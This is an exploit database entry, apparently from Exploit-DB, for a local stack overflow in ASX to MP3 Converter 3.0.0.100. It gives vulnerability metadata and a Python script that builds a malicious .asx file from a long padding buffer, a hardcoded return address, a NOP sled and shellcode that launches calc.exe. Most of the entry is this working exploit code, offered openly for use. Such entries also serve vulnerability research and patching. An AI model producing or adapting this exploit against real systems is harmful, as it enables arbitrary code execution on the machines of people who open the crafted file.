ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit

vendor:

ASX to MP3 Converter

by:

Hazem Mofeed

9,3

CVSS

HIGH

Stack Overflow

121

CWE

Product Name: ASX to MP3 Converter

Affected Version From: 3.0.0.100

Affected Version To: 3.0.0.100

Patch Exists: YES

Related CWE: N/A

CPE: a:asx_to_mp3_converter:asx_to_mp3_converter:3.0.0.100

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Home Edition SP3

2009

ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit

ASX to MP3 Converter Version 3.0.0.100 is vulnerable to a local stack overflow exploit. The vulnerability is triggered when a maliciously crafted .asx file is opened, which can lead to arbitrary code execution. The exploit code builds a malicious .asx file containing a shellcode and a return address, which is then used to overwrite the stack and execute the shellcode.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python

import time
# ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit
# Author: Hazem Mofeed
# PoC: http://www.exploit-db.com/exploits/11930
# Tested On: Windows Xp Home Edition SP3
# Home: http://hakxer.wordpress.com

print ' Exploited by Hazem Mofeed \n'
print ' ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit \n'

print ' building exploit ..........'

time.sleep(3)

shellcode = ("\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65")

ret = "\x08\x6A\x83\x7C"
null = "\x90" * 10
exploit = ("http://" + "\x41" * 26117 + ret + null + shellcode )
try:
file = open("exploit.asx","w")
file.write(exploit)
file.close()
except:
print ' failed '